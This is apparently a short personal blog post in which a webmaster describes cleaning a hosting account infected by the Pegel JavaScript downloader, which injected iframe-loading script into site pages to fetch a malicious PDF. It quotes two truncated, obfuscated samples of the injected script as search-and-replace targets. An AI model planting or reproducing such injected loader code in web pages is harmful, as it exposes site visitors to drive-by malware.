trojan horse, virus report: Trojan Downloader JS Pegel d
http://www.viruslist.com/hch/search?VN=Trojan-Downloader.JS.Pegel.d
no information from this link
strange javascript were inserted to index.html, index.php, main.html, main.php, *.js
in webhosting server
after check
strange javascript will run in IE, Firefox
to make an iframe
to download a pdf "ChangeLog.pdf"
from ru website
ref:
http://bbs.janmeng.com/redirect.php?tid=915346&goto=lastpost
after I found the strange code
update antivirus, pdf reader, broswer
steps of my solution :
1. download files back to PC
2. files got deleted when antivirus activated
3. disable antivirus then download files
(zip a copy)
4. manual delete javascript code for 10 files.
5. use notepad+ to search and replace javascript
6. enable antivirus then upload files
2 types of javascript to search and replace
type 1
<script>
/*Exception*/ document.write('<script src='+'h&t()$#t(p!(:!^</b>...<b>\!|\^|&/ig, '')+' defer=defer></scr'+'ipt>');
</script>
type 2
/*Exception*/ document.write('<script src='+'h&t()$#t(p!(:!^</b>...<b>\!|\^|&/ig, '')+' defer=defer></scr'+'ipt>');
hour to update and clear all files for 1 domain
total 8:
so bad luck
係新加坡睇戲: The Cathay
13 年前
文章
沒有留言:
發佈留言